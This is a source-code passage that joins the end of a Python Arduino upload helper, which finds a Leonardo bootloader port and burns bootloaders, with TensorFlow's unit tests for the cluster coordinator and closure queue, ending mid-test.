msg = 'Ports {%s}/{%s} => {%s}\n' % (before_serial_list, now_serial_list,
diff_serial_list)
output_console.printText(msg)
if len(diff_serial_list) > 0:
caterina_serial_port = diff_serial_list[0]
if show_upload_output:
msg = 'Found new upload port: %s.\n' % caterina_serial_port
output_console.printText(msg)
break
# Keep track of port that disappears
# before_serial_list = now_serial_list
time.sleep(0.25)
elapsed += 250
# On Windows, it can take a long time for the port to disappear and
# come back, so use a longer time out before assuming that the selected
# port is the bootloader (not the sketch).
if (((constant.sys_platform != 'windows' and elapsed >= 500)
or elapsed >= 5000) and (serial_port in now_serial_list)):
if show_upload_output:
msg = 'Uploading using selected port: %s.\n' % serial_port
output_console.printText(msg)
caterina_serial_port = serial_port
break
if not caterina_serial_port:
msg = 'Couldn\'t find a Leonardo on the selected port.\nCheck that you have the correct port selected.\nIf it is correct, try pressing the board\'s reset button after initiating the upload.\n'
output_console.printText(msg)
return caterina_serial_port
class Bootloader:
def __init__(self, cur_project, args):
self.args = args.getArgs()
erase_command_text = self.args['erase.pattern']
burn_command_text = self.args['bootloader.pattern']
erase_command = compiler.Command(erase_command_text)
burn_command = compiler.Command(burn_command_text)
self.command_list = [erase_command, burn_command]
self.output_console = console.Console(cur_project.getName())
def start(self):
upload_thread = threading.Thread(target=self.burn)
upload_thread.start()
def burn(self):
for cur_command in self.command_list:
return_code = cur_command.run(self.output_console)
if return_code > 0:
self.output_console.printText('[Error %d]\n' % return_code)
break
def diffList(now_list, before_list):
diff_list = now_list
for before_item in before_list:
if before_item in diff_list:
diff_list.remove(before_item)
return diff_list
|
cluster_coordinator_test.py
|
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for coordinator.py."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import contextlib
import functools
import os
import platform
import sys
import threading
import time
from tensorflow.python.compat import v2_compat
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.distribute import distribute_utils
from tensorflow.python.distribute import distribution_strategy_context
from tensorflow.python.distribute import input_lib
from tensorflow.python.distribute import multi_worker_test_base
from tensorflow.python.distribute import parameter_server_strategy_v2
from tensorflow.python.distribute.cluster_resolver import SimpleClusterResolver
from tensorflow.python.distribute.coordinator import cluster_coordinator as coordinator_lib
from tensorflow.python.distribute.coordinator import values as values_lib
from tensorflow.python.eager import cancellation
from tensorflow.python.eager import def_function
from tensorflow.python.eager import test
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import tensor_spec
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import coordinator
from tensorflow.python.training.server_lib import ClusterSpec
class CoordinatedClosureQueueTest(test.TestCase):
def testBasic(self):
queue = coordinator_lib._CoordinatedClosureQueue()
closure1 = self._create_closure(queue._cancellation_mgr)
queue.put(closure1)
self.assertIs(closure1, queue.get())
self.assertFalse(queue.done())
queue.put_back(closure1)
self.assertEqual(closure1, queue.get())
queue.mark_finished()
self.assertTrue(queue.done())
queue.wait()
def testProcessAtLeaseOnce(self):
closure_queue = coordinator_lib._CoordinatedClosureQueue()
labels = ['A', 'B', 'C', 'D', 'E']
processed_count = collections.defaultdict(int)
coord = coordinator.Coordinator(clean_stop_exception_types=[])
def process_queue():
with coord.stop_on_exception():
has_been_put_back = False
while True:
closure = closure_queue.get(timeout=30)
if closure is None:
break
if not has_been_put_back:
has_been_put_back = True
closure_queue.put_back(closure)
continue
closure._function()
closure_queue.mark_finished()
def get_func(label):
def func():
time.sleep(3)
processed_count[label] += 1
return func
cm = cancellation.CancellationManager()
for label in labels:
closure_queue.put(coordinator_lib.Closure(get_func(label), cm))
t1 = threading.Thread(target=process_queue, daemon=True)
t1.start()
t2 = threading.Thread(target=process_queue, daemon=True)
t2.start()
# Make sure multiple wait() calls are fine.
closure_queue.wait()
closure_queue.wait()
closure_queue.wait()
closure_queue.wait()
self.assertEqual(processed_count, collections.Counter(labels))
coord.join([t1, t2])
def testNotifyBeforeWait(self):
closure_queue = coordinator_lib._CoordinatedClosureQueue()
def func():
logging.info('func running')
coord = coordinator.Coordinator(clean_stop_exception_types=[])
def process_queue():
with coord.stop_on_exception():
closure_queue.get()
closure_queue.mark_finished()
closure_queue.put(
coordinator_lib.Closure(func, closure_queue._cancellation_mgr))
t = threading.Thread(target=process_queue)
t.start()
coord.join([t])
# This test asserts that waiting at the time the function has been processed
# doesn't time out.
closure_queue.wait()
def _assert_one_unblock_the_other(self, first_fn, second_fn):
"""Asserts `second_fn` wouldn't return before `first_fn` is finished."""
first_fn_done = threading.Event()
second_fn_done = threading.Event()
coord = coordinator.Coordinator(clean_stop_exception_types=[])
def wrapped_first_fn():
with coord.stop_on_exception():
self.assertFalse(second_fn_done.is_set())
first_fn()
first_fn_done.set()
self.assertFalse(first_fn_done.is_set())
t = threading.Thread(target=wrapped_first_fn)
t.start()
second_fn()
self.assertTrue(first_fn_done.is_set())
second_fn_done.set()
coord.join([t])
def testWaitRaiseErrorAfterMarkFailure(self):
if sys.version_info >= (3, 8) and platform.system() == 'Windows':
# TODO(b/165013260): Fix this
self.skipTest('Test is currently broken on Windows with Python 3.8')
closure_queue = coordinator_lib._CoordinatedClosureQueue()
closure_queue.put(self._create_closure(closure_queue._cancellation_mgr))
closure = closure_queue.get()
wait_finish_event = threading.Event()
coord = coordinator.Coordinator(clean_stop_exception_types=[])
# Using a thread to verify that closure_queue.wait() will not return until
# all inflight closures are finished.
def mark_finished_fn():
try:
raise ValueError('Some error.')
except ValueError as e:
closure_queue.mark_failed(e)
def wait_fn():
with self.assertRaises(ValueError):
closure_queue.wait()
self._assert_one_unblock_the_other(mark_finished_fn, wait_fn)
self.assertTrue(closure_queue.done())
def _create_closure(self, cancellation_mgr):
@def_function.function()
def some_function():
return 1.0
return coordinator_lib.Closure(some_function, cancellation_mgr)
def _put_two_closures_and_get_one(self):
closure_queue = coordinator_lib._CoordinatedClosureQueue()
closure1 = self._create_closure(closure_queue._cancellation_mgr)
closure_queue.put(closure1)
closure2 = self._create_closure(closure_queue._cancellation_mgr)
closure_queue.put(closure2)
closure_got = closure_queue.get() # returns closure1
self.assertIs(closure_got, closure1)
self.assertIsNot(closure_got, closure2)
return closure_queue, closure1, closure2
def testPutRaiseError(self):
if sys.version_info >= (3, 8) and platform.system() == 'Windows':
# TODO(b/165013260): Fix this
self.skipTest('Test is currently broken on Windows with Python 3.8')
closure_queue, _, closure2 = self._put_two_closures_and_get_one()
closure_queue.mark_failed(ValueError())
with self.assertRaises(ValueError):
closure_queue.put(self._create_closure(closure_queue._cancellation_mgr))
self.assertTrue(closure_queue.done())
with self.assertRaisesRegex(
errors.CancelledError,
'The corresponding function is cancelled. Please reschedule the '
'function.'):
closure2.output_remote_value.fetch()
# The error is cleared.
closure_queue.put(self._create_closure(closure_queue._cancellation_mgr))
def testWaitRaiseError(self):
if sys.version_info >= (3, 8) and platform.system() == 'Windows':
# TODO(b/165013260): Fix this
self.skipTest('Test is currently broken on Windows with Python 3.8')
closure_queue, _, closure2 = self._put_two_closures_and_get_one()
closure_queue.mark_failed(ValueError())
with self.assertRaises(ValueError):
closure_queue.wait()
self.assertTrue(closure_queue.done())
with self.assertRaisesRegex(
errors.CancelledError,
'The corresponding function is cancelled. Please reschedule the '
'function.'):
closure2.output_remote_value.fetch()
# The error is cleared.
closure_queue.wait()
def testDoneRaiseError(self):
if sys.version_info >= (3, 8) and platform.system() == 'Windows':
# TODO(b/165013260): Fix this
self.skipTest('Test is currently broken on Windows with Python 3.8')
closure_queue, _, _ = self._put_two_closures_and_get_one()
self.assertFalse(closure_queue.done())
closure_queue.mark_failed(ValueError())
with self.assertRaises(ValueError):
closure_queue.done()
def _set_error(self, closure_queue, closure, error):
try:
raise error
except Exception as e: # pylint: disable=broad-except
closure.output_remote_value._set_error(e)
closure_queue.mark_failed(e)
def _test_cancel_closure_when_error(self, call_wait):
if sys.version_info >= (3, 8) and platform.system() == 'Windows':
# TODO(b/165013260): Fix this
self.skipTest('Test is currently broken on Windows with Python 3.8')
closure_queue, closure1, closure2 = self._put_two_closures_and_get_one()
closure_queue.put(self._create_closure(closure_queue._cancellation_mgr))
closure_queue.get()
# At this moment, there are two inflight, one in queue.
self.assertEqual(closure_queue._inflight_closure_count, 2)
# Hold a copy of the queue's cancellation manager at this point
initial_cm = closure_queue._cancellation_mgr
# Simulating closure1 fails.
self._set_error(closure_queue, closure1, ValueError('Some error.'))
# At this moment, there are one inflight, one in queue.
self.assertEqual(closure_queue._queue.qsize(), 1)
self.assertEqual(closure_queue._inflight_closure_count, 1)
closure3 = self._create_closure(closure_queue._cancellation_mgr)
def fake_cancellation():
self._set_error(closure_queue, closure2,
ValueError('Fake cancellation error.'))
def report_error():
# It should not report the fake cancellation error.
with self.assertRaisesRegex(ValueError, 'Some error.'):
# Verifying `wait()` or `put()` raises even if one closure is in
# flight.
if call_wait:
closure_queue.wait()
else:
closure_queue.put(closure3)
self._assert_one_unblock_the_other(fake_cancellation, report_error)
# The original cancellation manager of the queue has been cancelled.
self.assertTrue(initial_cm.is_cancelled)
# At this moment, there is zero inflight, nothing in queue.
self.assertTrue(closure_queue._queue.empty())
self.assertEqual(closure_queue._inflight_closure_count, 0)
self.assertIsNone(closure_queue._error)
# This asserts that closure1 has errored.
with self.assertRaisesRegex(ValueError, 'Some error.'):
closure1.output_remote_value.fetch()
# The following asserts that closure3 should have been cancelled.
if not call_wait:
with self.assertRaisesRegex(
errors.CancelledError,
'The corresponding function is cancelled. Please reschedule the '
'function.'):
closure3.output_remote_value.fetch()
# Closure2 was an inflight closure when it got cancelled.
self.assertEqual(closure2.output_remote_value._status,
values_lib.RemoteValueStatus.READY)
with self.assertRaisesRegex(ValueError, 'Fake cancellation error.'):
closure2.output_remote_value.fetch()
# This asserts that the queue has a clear state.
self.testBasic()
def testWaitRaiseErrorAfterCancelClosure(self):
self._test_cancel_closure_when_error(call_wait=True)
def testPutRaiseErrorAfterCancelClosure(self):
self._test_cancel_closure_when_error(call_wait=False)
def testStateIsRestoredAfterJoinIsCalled(self):
if sys.version_info >= (3, 8) and platform.system() == 'Windows':
# TODO(b/165013260): Fix this
self.skipTest('Test is currently broken on Windows with Python 3.8')
closure_queue, _, _ = self._put_two_closures_and_get_one()
self.assertEqual(closure_queue._inflight_closure_count, 1)
closure_queue.mark_failed(ValueError('test error'))
with self.assertRaises(ValueError):
closure_queue.put(self._create_closure(closure_queue._cancellation_mgr))
# Its error should have been cleared.
self.assertIsNone(closure_queue._error)
closure_queue.put(self._create_closure(closure_queue._cancellation_mgr))
self.assertIsNone(closure_queue._error)
def testThreadSafey(self):
thread_count = 10
queue = coordinator_lib._CoordinatedClosureQueue()
# Each thread performs 20 queue actions: 10 are `put_back` and 10 are
# `mark_finished`.
action_count = 20
def func():
for i in range(action_count):
closure = queue.get()
if i % 2 == 0:
queue.put_back(closure)
else:
queue.mark_finished()
threads = [threading.Thread(target=func) for i in range(thread_count)]
for t in threads:
t.start()
for _ in range(thread_count * action_count // 2):
queue.put(self._create_closure(queue._cancellation_mgr))
queue.wait()
self.assertTrue(queue.done())
class ErrorReportingThread(threading.Thread):
error = None
def __init__(self, *args, **kwargs):
assert 'target' in kwargs
target = kwargs['target']
@functools.wraps(target)
def wrapped_target(*args, **kwargs):
try:
return target(*args, **kwargs)
except Exception as e: # pylint: disable=broad-except
ErrorReportingThread.error = e
kwargs['target'] = wrapped_target
super(ErrorReportingThread, self).__init__(*args, **kwargs)
class TestCaseWithErrorReportingThread(test.TestCase):
@classmethod
def setUpClass(cls):
cls._threading_thread = threading.Thread
threading.Thread = ErrorReportingThread
super(TestCaseWithErrorReportingThread, cls).setUpClass()
@classmethod
def tearDownClass(cls):
super(TestCaseWithErrorReportingThread, cls).tearDownClass()
threading.Thread = cls._threading_thread
def setUp(self):
ErrorReportingThread.error = None
super(TestCaseWithErrorReportingThread, self).setUp()
def tearDown(self):
super(TestCaseWithErrorReportingThread, self).tearDown()
if ErrorReportingThread.error:
raise ErrorReportingThread.error # pylint: disable=raising-bad-type
def make_coordinator(num_workers, num_ps):
# TODO(rchao): Test the internal rpc_layer version.
cluster_def = multi_worker_test_base.create_in_process_cluster(
num_workers=num_workers, num_ps=num_ps, rpc_layer='grpc')
cluster_def['chief'] = [
'localhost:%d' % multi_worker_test_base.pick_unused_port()
]
cluster_resolver = SimpleClusterResolver(
ClusterSpec(cluster_def), rpc_layer='grpc')
strategy = parameter_server_strategy_v2.ParameterServerStrategyV2(
cluster_resolver)
return coordinator_lib.ClusterCoordinator(strategy)
class ClusterCoordinatorTest(TestCaseWithErrorReportingThread):
@classmethod
def setUpClass(cls):
super(ClusterCoordinatorTest, cls).setUpClass()
cls.coordinator = make_coordinator(num_workers=5, num_ps=2)
cls.strategy = cls.coordinator.strategy
def testClusterCoordinatorOnlyInitOnce(self):
cluster = self.coordinator._cluster
same_coordinator = coordinator_lib.ClusterCoordinator(self.strategy)
self.assertIs(self.coordinator, same_coordinator)
self.assertIs(cluster, same_coordinator._cluster)
def testFnReturnNestedValues(self):
x = constant_op.constant(1)
@def_function.function
def f():
return x + 1, (x + 2, x + 3), [x + 4], {'v': x}
got = self.coordinator.schedule(f)
want = 2, (3, 4), [5], {'v': 1}
self.assertEqual(got.fetch(), want)
self.assertEqual(self.coordinator.fetch(got), want)
def testFetchingRemoteValueStructure(self):
x = constant_op.constant(1)
@def_function.function
def f():
return x + 1, (x + 2, x + 3), [x + 4], {'v': x}
want = 2, (3, 4), [5], {'v': 1}
remote_value_list = [self.coordinator.schedule(f) for _ in range(5)]
self.assertAllEqual(
self.coordinator.fetch(remote_value_list), [want for _ in range(5)])
def testInputFunction(self):
def input_fn():
return dataset_ops.DatasetV2.range(1, 2)
with self.strategy.scope():
v = variables.Variable(initial_value=0, dtype=dtypes.int64)
@def_function.function
def worker_fn(iterator):
x = next(iterator)
v.assign_add(x)
return x
distributed_dataset = self.coordinator.create_per_worker_dataset(input_fn)
result = self.coordinator.schedule(
worker_fn, args=(iter(distributed_dataset),))
result = self.coordinator.fetch(result)
self.assertEqual(result, (1,))
result = self.coordinator.schedule(
worker_fn, args=(iter(distributed_dataset),))
result = self.coordinator.fetch(result)
self.assertEqual(result, (1,))
self.assertAlmostEqual(v.read_value(), 2, delta=1e-6)
def testAsyncScheduleAndJoin(self):
if test_util.is_xla_enabled():
self.skipTest('Assign_add is not deterministic across threads in XLA')
def input_fn():
return dataset_ops.DatasetV2.from_tensor_slices([2] * 10)
with self.strategy.scope():
v = variables.Variable(initial_value=0, dtype=dtypes.int32)
# TODO(yuefengz): the following tf.function has a return value which is None
# in its structured_outputs.
@def_function.function
def worker_fn(iterator):
x = next(iterator)
v.assign_add(x)
distributed_dataset = self.coordinator.create_per_worker_dataset(input_fn)
iterator = iter(distributed_dataset)
# Verifying joining without any scheduling doesn't hang.
self.coordinator.join()
self.assertEqual(v.read_value().numpy(), 0)
for _ in range(5):
self.coordinator.schedule(worker_fn, args=(iterator,))
self.coordinator.join()
# With 5 addition it should be 2*5 = 10.
self.assertEqual(v.read_value().numpy(), 10)
for _ in range(5):
self.coordinator.schedule(worker_fn, args=(iterator,))
# Verifying multiple join is fine.
self.coordinator.join()
self.coordinator.join()
self.coordinator.join()
self.assertTrue(self.coordinator.done())
# Likewise, it's now 20.
self.assertEqual(v.read_value().numpy(), 20.)
def testInputFunctionWithMap(self):
self._map_fn_tracing_count = 0
def input_fn():
def map_fn(x):
self._map_fn_tracing_count += 1
return x + 10
return dataset_ops.DatasetV2.range(0, 10).map(map_fn)
@def_function.function
def worker_fn(iterator):
return next(iterator)
distributed_dataset = self.coordinator.create_per_worker_dataset(input_fn)
result = self.coordinator.schedule(
worker_fn, args=(iter(distributed_dataset),))
self.assertEqual(result.fetch(), (10,))
self.assertEqual(self._map_fn_tracing_count, 1)
def testInputFunctionCreateVariables(self):
def input_fn():
v = variables.Variable(initial_value=0.0)
return v.read_value()
with self.assertRaises(ValueError):
self.coordinator.create_per_worker_dataset(input_fn)
def testDatasetsShuffledDifferently(self):
# This test requires at least two workers in the cluster.
self.assertGreaterEqual(len(self.coordinator._cluster.workers), 2)
random_seed.set_random_seed(None)
def input_fn():
dataset = dataset_ops.DatasetV2.range(0, 100).shuffle(100).batch(1)
return self.strategy.experimental_distribute_dataset(dataset)
distributed_dataset = self.coordinator.create_per_worker_dataset(input_fn)
distributed_iterator = iter(distributed_dataset)
# Get elements from the first two iterators.
iterator_1 = distributed_iterator._values[0]
iterator_1._rebuild_on(self.coordinator._cluster.workers[0])
iterator_1 = iterator_1.fetch()
elements_in_iterator_1 = [
self.strategy.experimental_local_results(e)
for e in iterator_1
]
iterator_2 = distributed_iterator._values[1]
iterator_2._rebuild_on(self.coordinator._cluster.workers[1])
iterator_2 = iterator_2.fetch()
elements_in_iterator_2 = [
self.strategy.experimental_local_results(e)
for e in iterator_2
]
self.assertNotAllEqual(elements_in_iterator_1, elements_in_iterator_2)
def testPerWorkerValue(self):
self.skipTest('b/168569314')
var_shape = tuple()
var_dtype = dtypes.float32
var_name = 'var'
def create_var():
var = variables.Variable(
initial_value=0.0, dtype=var_dtype, name=var_name)
self.assertIn('worker', var.device)
return var
worker_local_var = self.coordinator._create_per_worker_resources(create_var)
# The following is a workaround to allow `worker_local_var` to be passed in
# as args to the `coordinator.schedule` method which requires tensor specs
# to trace tf.function but _create_worker_resources' return values don't
# have tensor specs. We can get rid of this workaround once
# _create_worker_resources is able to infer the tensor spec of the return
# value of the function passed in. See b/154675763.
for var in worker_local_var._values:
var._type_spec = tensor_spec.TensorSpec(var_shape, var_dtype, var_name)
def worker_fn(var):
var.assign_add(1.0)
for _ in range(10):
# Which slice of `worker_local_var` will be used will depend on which
# worker the `worker_fn` gets scheduled on.
self.coordinator.schedule(worker_fn, args=(worker_local_var,))
self.coordinator.join()
var_sum = sum(self.coordinator.fetch(worker_local_var._values))
self.assertEqual(var_sum, 10.0)
def testDisallowRemoteValueAsInput(self):
@def_function.function
def func_0():
return 1.0
@def_function.function
def func_1(x):
return x + 1.0
remote_v = self.coordinator.schedule(func_0)
with self.assertRaises(ValueError):
self.coordinator.schedule(func_1, args=(remote_v,))
def testPythonFunctionNotAllowedToSchedule(self):
def func(a):
return array_ops.identity(a)
with self.assertRaisesRegexp(
TypeError,
'`tf.distribute.experimental.coordinator.ClusterCoordinator.schedule` '
'only accepts a `tf.function` or a concrete function.'):
self.coordinator.schedule(func, args=(1,))
def testDatasetPartiallyCreatedOnCoordinator(self):
dataset = dataset_ops.DatasetV2.range(1, 10)
@def_function.function
def input_fn():
return dataset.shuffle(9)
@def_function.function
def worker_fn(iterator):
x = next(iterator)
return x
per_worker_dataset = self.coordinator.create_per_worker_dataset(input_fn)
self.coordinator.schedule(worker_fn, args=(iter(per_worker_dataset),))
with self.assertRaisesRegexp(
coordinator_lib.InputError,
'error message is Failed copying input tensor from'):
self.coordinator.join()
class LimitedClosureQueueSizeBasicTest(ClusterCoordinatorTest):
"""Test basic functionality works with explicit maximum closure queue size.
Execute the same set of test cases as in `ClusterCoordinatorTest`, with an
explicit size limit for the closure queue. Note that even when the queue size
is set to infinite, there is still a maximum practical size (depends on host
memory limit) that might cause the queue.put operations to be blocking when
scheduling a large number of closures on a big cluster. These tests make sure
that the coordinator does not run into deadlocks in such scenario.
"""
@classmethod
def setUpClass(cls):
super(LimitedClosureQueueSizeBasicTest, cls).setUpClass()
coordinator_lib._CLOSURE_QUEUE_MAX_SIZE = 2
cls.coordinator = make_coordinator(num_workers=5, num_ps=2)
cls.strategy = cls.coordinator.strategy
class ScheduleStartDelayTest(ClusterCoordinatorTest):
"""Test basic functionality works with worker scheduling delay.
This is basically to make sure that setting environment variables
`TF_COORDINATOR_SCHEDULE_START_DELAY` and
`TF_COORDINATOR_SCHEDULE_START_DELAY_MAX` will cause any failure.
"""
@classmethod
def setUpClass(cls):
super(ScheduleStartDelayTest, cls).setUpClass()
os.environ['TF_COORDINATOR_SCHEDULE_START_DELAY'] = '2'
os.environ['TF_COORDINATOR_SCHEDULE_START_DELAY_MAX'] = '4'
cls.coordinator = make_coordinator(num_workers=3, num_ps=2)
cls.strategy = cls.coordinator.strategy
@classmethod
def tearDownClass(cls):
del os.environ['TF_COORDINATOR_SCHEDULE_START_DELAY']
del os.environ['TF_COORDINATOR_SCHEDULE_START_DELAY_MAX']
super(ScheduleStartDelayTest, cls).tearDownClass()
class ErrorReportingTest(TestCaseWithErrorReportingThread):
@classmethod
def setUpClass(cls):
super(ErrorReportingTest, cls).setUpClass()
cls.coordinator = make_coordinator(num_workers=3, num_ps=2)
cls.strategy = cls.coordinator.strategy
with cls.strategy.scope():
cls.iteration = variables.Variable(initial_value=0.0)
@def_function.function
def _normal_function(self):
x = random_ops.random_uniform((2, 10))
y = random_ops.random_uniform((10, 2))
self.iteration.assign_add(1.0)
return math_ops.reduce_mean(math_ops.matmul(x, y))
@def_function.function
def _error_function(self):
x = random_ops.random_uniform((2, 10))
y = random_ops.random_uniform((10, 2))
check_ops.assert_non_positive_v2(math_ops.reduce_sum(math_ops.matmul(x, y)))
self.iteration.assign_add(1.0)
return self.iteration
@def_function.function
def _long_function(self):
x = random_ops.random_uniform((1000, 1000))
for _ in math_ops.range(10000):
a = random_ops.random_uniform((1000, 1000))
b = random_ops.random_uniform((1000, 1000))
x += math_ops.matmul(a, b)
return x
def testJoinRaiseError(self):
for _ in range(3):
self.coordinator.schedule(self._normal_function)
self.coordinator.schedule(self._error_function)
with self.assertRaises(errors.InvalidArgumentError):
self.coordinator.join()
def testScheduleRaiseError(self):
for _ in range(3):
self.coordinator.schedule(self._normal_function)
self.coordinator.schedule(self._error_function)
with self.assertRaises(errors.InvalidArgumentError):
while True:
self.coordinator.schedule(self._normal_function)
def testScheduleRaiseErrorWithMultipleFailure(self):
for _ in range(3):
self.coordinator.schedule(self._normal_function)
self.coordinator.schedule(self._error_function)
with self.assertRaises(errors.InvalidArgumentError):
while True:
self.coordinator.schedule(self._error_function)
self.coordinator.join()
def testErrorWillbeCleared(self):
self.coordinator.schedule(self._error_function)
with self.assertRaises(errors.InvalidArgumentError):
self.coordinator.join()
for _ in range(3):
self.coordinator.schedule(self._normal_function)
self.coordinator.schedule(self._error_function)
with self.assertRaises(errors.InvalidArgumentError):
self.coordinator.join()
def testRemoteValueReturnError(self):
result = self.coordinator.schedule(self._error_function)
with self.assertRaises(errors.InvalidArgumentError):
result.fetch()
# Clear the error.
with self.assertRaises(errors.InvalidArgumentError):
self.coordinator.join()
def testInputError(self):
worker_local_val = self.coordinator._create_per_worker_resources(
self._error_function)
@def_function.function
def func(x):
return x + 1
result = self.coordinator.schedule(func, args=(worker_local_val,))
with self.assertRaises(coordinator_lib.InputError):
self.coordinator.join()
with self.assertRaises(coordinator_lib.InputError):
result.fetch()
def testCancellation(self):
for _ in range(3):
self.coordinator.schedule(self._normal_function)
long_function = self.coordinator.schedule(self._long_function)
self.coordinator.schedule(self._error_function)
with self.assertRaises(errors.InvalidArgumentError):
self.coordinator.join()
with self.assertRaises(errors.CancelledError):
long_function.fetch()
for _ in range(3):
self.coordinator.schedule(self._normal_function)
self.coordinator.join()
class LimitedClosureQueueErrorTest(ErrorReportingTest):
"""Test error reporting works with explicit maximum closure queue size.
Execute the same set of test cases as in ErrorReportingTest, with an explicit
size limit for the closure queue.
"""
@classmethod
def setUpClass(cls):
super(LimitedClosureQueueErrorTest, cls).setUpClass()
coordinator_lib._CLOSURE_QUEUE_MAX_SIZE = 2
cls.coordinator = make_coordinator(num_workers=3, num_ps=2)
cls.strategy = cls.coordinator.strategy
with cls.coordinator.strategy.scope():
cls.iteration = variables.Variable(initial_value=0.0)
class StrategyIntegrationTest(test.TestCase):
@classmethod
def setUpClass(cls):
super(StrategyIntegrationTest, cls).setUpClass()
cls.coordinator = make_coordinator(num_workers=1, num_ps=1)
cls.strategy = cls.coordinator.strategy
def testRunNotUsedWithClusterCoordinatorSchedule(self):
@def_function.function
def input_fn():
return dataset_ops.DatasetV2.range(1, 3)
with self.strategy.scope():
v = variables.Variable(initial_value=1, dtype=dtypes.int64)
def replica_fn(input_tensor):
return input_tensor + v, input_tensor - v
@def_function.function
def worker_fn(iterator):
return self.strategy.run(replica_fn, args=(next(iterator),))
per_worker_dataset = self.coordinator.create_per_worker_dataset(input_fn)
@contextlib.contextmanager
def _assert_logs_usage_warning():
with self.assertLogs(level='WARNING') as logs:
yield
self.assertIn(
'It is detected that a function used with '
'`tf.distribute.experimental.ParameterServerStrategy` '
'is executed locally on the coordinator. This is inefficient but may '
'be valid for one-off tasks such as inferring output signature. '
'To properly distribute functions to run on workers, `run` or '
'`reduce` should be used within a function passed to `'
'tf.distribute.experimental.coordinator.ClusterCoordinator.schedule`'
'.',
logs.output[0])
with _assert_logs_usage_warning():
# Invoking `run` without `coordinator.schedule` should result in a
# warning.
self.strategy.run(
replica_fn, args=(constant_op.constant(1, dtype=dtypes.int64),))
# A proper `schedule` should succeed.
rv = self.coordinator.schedule(worker_fn, args=(iter(per_worker_dataset),))
with _assert_logs_usage_warning():
# Invoking `run` without `coordinator.schedule` again should result in a
# warning.
self.strategy.run(
replica_fn, args=(constant_op.constant(1, dtype=dtypes.int64),))
all_results = [(2, 0)] * self.strategy.num_replicas_in_sync
expected_result = []
for i in range(self.strategy.num_replicas_in_sync):
expected_result.append(all_results[i])
self.assertAllEqual(
tuple(expected_result),
self.strategy.experimental_local_results(rv.fetch()))
def testBasicVariableAssignment(self):
self.strategy.extended._variable_count = 0
with self.strategy.scope():
v1 = variables.Variable(initial_value=0.0)
v2 = variables.Variable(initial_value=1.0)
self.assertEqual(self.strategy.extended._variable_count, 2)
@def_function.function
def worker_fn():
v1.assign_add(0.1)
v2.assign_sub(0.2)
return v1.read_value() / v2.read_value()
results = self.coordinator.schedule(worker_fn)
logging.info('Results of experimental_run_v2: %f',
self.coordinator.fetch(results))
self.assertAlmostEqual(v1.read_value().numpy(), 0.1, delta=1e-6)
self.assertAlmostEqual(v2.read_value().numpy(), 0.8, delta=1e-6)
def testRunAndReduce(self):
self.assertFalse(distribution_strategy_context.in_cross_replica_context())
with self.strategy.scope():
self.assertTrue(distribution_strategy_context.in_cross_replica_context())
v = variables.Variable(initial_value=1.)
expected_result = (4. * self.strategy.num_replicas_in_sync,
2. * self.strategy.num_replicas_in_sync)
@def_function.function
def worker_fn(input_tensor):
def replica_fn(input_tensor):
# Within `replica_fn`, it has to be in a replica context.
self.assertFalse(
distribution_strategy_context.in_cross_replica_context())
return input_tensor + v, input_tensor - v
run_result = self.strategy.run(replica_fn, args=(input_tensor,))
reduced_result = self.strategy.reduce('SUM', run_result, axis=None)
check_ops.assert_equal_v2(reduced_result, expected_result)
return reduced_result
# Asserting scheduling in scope has the expected behavior.
result = self.coordinator.schedule(
worker_fn, args=(constant_op.constant(3.),))
self.assertIsInstance(result, coordinator_lib.RemoteValue)
self.assertEqual(result.fetch(), expected_result)
# Asserting scheduling out of scope has the expected behavior.
result = self.coordinator.schedule(
worker_fn, args=(constant_op.constant(3.),))
self.assertEqual(result.fetch(), expected_result)
def testRunAndReduceWithAssignAdd(self):
self.assertFalse(distribution_strategy_context.in_cross_replica_context())
with self.strategy.scope():
self.assertTrue(distribution_strategy_context.in_cross_replica_context())
v = variables.Variable(initial_value=1.)
v1 = variables.Variable(
initial_value=0.,
aggregation=variable_scope.VariableAggregation.ONLY_FIRST_REPLICA)
expected_result = (4. * self.strategy.num_replicas_in_sync,
2. * self.strategy.num_replicas_in_sync)
@def_function.function
def worker_fn(input_tensor):
def replica_fn(input_tensor):
# Within `replica_fn`, it has to be in a replica context.
self.assertFalse(
distribution_strategy_context.in_cross_replica_context())
v1.assign_add(input_tensor)
return input_tensor + v, input_tensor - v
run_result = self.strategy.run(replica_fn, args=(input_tensor,))
reduced_result = self.strategy.reduce('SUM', run_result, axis=None)
check_ops.assert_equal_v2(reduced_result, expected_result)
return reduced_result
# Asserting scheduling in scope has the expected behavior.
result = self.coordinator.schedule(
worker_fn, args=(constant_op.constant(3.),))
self.assertIsInstance(result, coordinator_lib.RemoteValue)
self.assertEqual(result.fetch(), expected_result)
# Asserting scheduling out of scope has the expected behavior.
result = self.coordinator.schedule(
worker_fn, args=(constant_op.constant(3.),))
self.assertEqual(result.fetch(), expected_result)
self.assertEqual(v1, 6.)
def testVariableAggregation(self):
self.assertFalse(distribution_strategy_context.in_cross_replica_context())
with self.strategy.scope():
self.assertTrue(distribution_strategy_context.in_cross_replica_context())
v = variables.Variable(
initial_value=1.,
aggregation=variable_scope.VariableAggregation.SUM)
@def_function.function
def worker_fn():
def replica_fn():
value = math_ops.cast(
distribution_strategy_context.get_replica_context()
.replica_id_in_sync_group + 1, v.dtype)
v.assign(value)
self.strategy.run(replica_fn)
self.coordinator.schedule(worker_fn)
self.coordinator.join()
expected_result = 0.
for i in range(self.strategy.num_replicas_in_sync):
expected_result = expected_result + i + 1
self.assertEqual(v, expected_result)
def testVariableCaching(self):
self.assertFalse(distribution_strategy_context.in_cross_replica_context())
